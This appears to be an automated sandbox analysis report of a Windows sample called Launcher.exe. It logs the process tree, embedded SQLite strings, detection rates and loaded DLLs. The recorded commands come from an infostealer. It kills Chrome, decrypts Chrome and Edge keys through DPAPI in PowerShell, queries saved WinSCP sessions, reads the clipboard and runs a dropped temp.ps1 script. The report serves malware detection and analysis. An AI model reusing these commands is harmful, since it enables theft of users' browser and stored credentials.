          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
          Source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
          Source: Launcher.exeVirustotal: Detection: 48%
          Source: Launcher.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,9387240218519264668,4487105206535593677,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,9387240218519264668,4487105206535593677,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /FJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
